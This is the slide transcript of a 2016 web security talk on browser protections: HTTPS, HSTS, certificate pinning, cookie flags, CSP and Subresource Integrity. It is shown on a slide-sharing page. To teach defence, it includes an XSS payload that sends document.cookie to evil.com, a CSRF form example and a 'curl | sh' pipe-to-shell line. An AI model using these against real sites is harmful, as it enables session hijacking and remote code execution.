Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Platform Security

Jérémy Courtial
October 26, 2016
Programming
0
43

Web Platform Security

Jérémy Courtial

October 26, 2016
Tweet

More Decks by Jérémy Courtial

See All by Jérémy Courtial
sudo give the cloud
mrartichaut
0
23
An introduction to AppSec?
mrartichaut
0
36
Secure by design: introduction to threat modeling
mrartichaut
0
39
Taming secrets with Vault
mrartichaut
0
73
Lead Tech: Empowering the team
mrartichaut
0
43
go doSomeThing()
mrartichaut
0
49
Practical Cryptography : Data Encryption
mrartichaut
0
55
Practical Cryptography : Password Hashing
mrartichaut
1
65
HTTP/2 : One connection to rule them all
mrartichaut
1
55

Other Decks in Programming

See All in Programming
敵対的ポイフル
futabato
0
120
Elm Form Validation
bkuhlmann
0
510
Azure OpenAI Serviceのプロンプトエンジニアリング入門
tomokusaba
3
860
初心者のためのRubyKaigi入門/RubyKaigi Introduction
a_matsuda
8
1.3k
Tailwind CSSを本気でカスタマイズする方法
fsubal
14
5.4k
Fragment Composition of GraphQL
quramy
13
1.4k
大規模UIKitベースアプリへのTCAの段階的導入/gradual-adoption-of-tca-in-a-large-scale-uikit-based-app
takehilo
2
200
Fast JSX: Don't clone props object #28768
yossydev
1
160
Kotlin Multiplatform at Stable and Beyond (Android Makers 2024)
zsmb
0
430
TCAとKMPを用いた新規動画配信アプリ 「ABEMA Live」の設計
tomu28
2
120
Milestoner
bkuhlmann
1
410
"config" ってなんだ? / What is "config"?
okashoi
0
250

Featured

See All Featured
Debugging Ruby Performance
tmm1
70
11k
Imperfection Machines: The Place of Print at Facebook
scottboms
261
12k
The Power of CSS Pseudo Elements
geoffreycrofte
61
5k
Happy Clients
brianwarren
92
6.4k
Code Reviewing Like a Champion
maltzj
515
39k
GraphQLの誤解/rethinking-graphql
sonatard
55
9.3k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
323
20k
Designing Experiences People Love
moore
136
23k
What the flash - Photography Introduction
edds
64
11k
10 Git Anti Patterns You Should be Aware of
lemiorhan
649
58k
Being A Developer After 40
akosma
66
580k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
117
18k

Transcript

  1. Web Platform Security Leveling up Jérémy Courtial Software Security Architect

  2. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin.

  3. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Rootkit ?

  4. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Malware ?

  5. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Trojan ?

  6. _______ : noun [c]. An application entirely dedicated to execute

    unknown code from unknown origin. Browser /ˈbraʊ.zɚ/

  7. http://yolo.com Go!

  8. curl -s http://yolo.com | sh VS http://yolo.com Go!

  9. Browser : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from unknown origin.

  10. Unknown origin

  11. Unknown origin Unsecure

  12. What is anyway ? www.google.com

  13. What is anyway ? www.oodrive.com

  14. What is anyway ? www.lol-cats.com

  15. What is anyway ? 172.217.20.46

  16. Unsecure origin

  17. Unsecure origin

  18. Transport Layer Security

  19. Confidentiality Integrity Authentication

  20. Other incentives "The green lock™"

  21. Other incentives HTTP/2

  22. Other incentives "Secure origins only" features

  23. http https

  24. GET /

  25. GET / 302 Found Location: https://yolo.com

  26. GET / 302 Found Location: https://yolo.com

  27. None
  28. None

  29. 302 Found

  30. 302 Found

  31. 302 Found

  32. HTTP Strict Transport Security

  33. Strict-Transport-Security :

  34. max-age=31536000; Strict-Transport-Security :

  35. includeSubdomains; max-age=31536000; Strict-Transport-Security :

  36. http://yolo.com

  37. http://yolo.com 307 Internal Redirect

  38. https://yolo.com 307 Internal Redirect

  39. 307 Internal Redirect GET / https://yolo.com

  40. Trust failure

  41. TLS certificates are based on trust

  42. Oh… trust … That's cute …

  43. Trust-based systems don't have a good reliability record …

  44. Certificate Authority failures Bad captive portal Every "Internal CA"

  45. You've failed me for the last time

  46. HTTP Certificate Pinning

  47. Public-Key-Pins:

  48. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM=";

  49. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g=";

  50. Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

  51. max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

  52. includeSubDomains; max-age=259200; Public-Key-Pins: pin-sha256="d6qzRu9zO…YYkVoZWmM="; pin-sha256="E9KB9INbd…xcMF+44U1g="; report-uri="http://example.com/pkp-report";

  53. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from unknown origin.

  54. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from Browser _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to execute unknown code from secured origins.

  55. Unknown code

  56. XSS <h1>Hello, ${username}</h1>

  57. XSS $username = "<img src=evil.com?cookies=" + document.cookie + "/>"

  58. XSS <h1>Hello, <img src="evil.com?cookies =JSESSIONID=5FZ4DS…" /> </h1>

  59. CSRF https://evil.com Click here!

  60. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

  61. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

  62. CSRF <form action="good.com/logo "> <input value="Click here!" type="submit"> </form> good.com/post

    <input value="I ❤ Justin Bieber" name="message" type="hidden">

  63. Everybody love cookies !

  64. Rename Cookie to Spinach ?

  65. Rename Cookie to Spinach ? Brussel Sprout ?

  66. REJECTED

  67. Locking the cookie jar

  68. Set-Cookie : JSESSIONID=12345;

  69. Set-Cookie : JSESSIONID=12345; secure;

  70. Set-Cookie : JSESSIONID=12345; secure; HttpOnly;

  71. Set-Cookie : JSESSIONID=12345; sameSite = strict | lax; secure; HttpOnly;

  72. Content Security Policy

  73. Content-Security-Policy

  74. : default-src 'none'; script-src 'self' 'api.google.com'; style-src … ; form-src

    … ; connect-src …; Content-Security-Policy

  75. : … report-uri …; script-src 'strict-dynamic' …; upgrade-insecure-requests; … Content-Security-Policy

  76. Our data (cookies, assets) are locked. What about third parties

    ?

  77. HTML JS JPG

  78. CDN HTML JS JPG JS JPG

  79. CDN HTML JS JPG JS JPG

  80. CDN HTML JS JPG JS JPG

  81. CDN HTML JS JPG JS JPG

  82. Subresource Integrity

  83. <script src="https://example.com/framework.js" > </script>

  84. <script src="https://example.com/framework.js" </script> integrity="sha384-oqVuAfXR….Y8wC">

  85. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from secured origins Browser unknown code

  86. _______ : noun [c]. /ˈbraʊ.zɚ/ An application entirely dedicated to

    execute unknown code from secured origins Browser trusted code

  87. Many more Suborigins iframe sandboxing Credentials Management

  88. https://www.w3.org/2011/webappsec/ @mikewest

  89. Times have changed

  90. Times have changed "secured" is the new default secured

  91. What does secured means ? secured Least Privilege Authentication Integrity

  92. Is our platform ? secured

  93. Thank you Icons from Ismael Ruiz, Konstantin Velichko, Rémy Médard,

    unlimicon (The Noun Project) and design.google.com/icons/